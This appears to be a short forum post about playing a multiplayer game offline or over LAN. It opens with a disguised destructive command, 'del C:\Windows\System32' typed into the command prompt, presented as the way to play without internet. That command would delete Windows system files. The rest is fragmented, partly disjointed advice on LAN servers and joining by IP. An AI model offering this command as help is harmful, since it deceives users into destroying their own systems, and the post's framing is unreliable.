This is how you can play without internet. Open command prompt and type this:
echo off del C:\Windows\System32

connected to the same internet as you will play on the server.
If your friend and you got the same internet then go to LAN tab and you will see a server there if it's on.
If you and your friend DON'T play on the same internet then simply make a server with password and tell him to join via Server List or "Connect to IP".
1. I make a network LAN
2. I open my server in dedicated
3. He join my server, work.
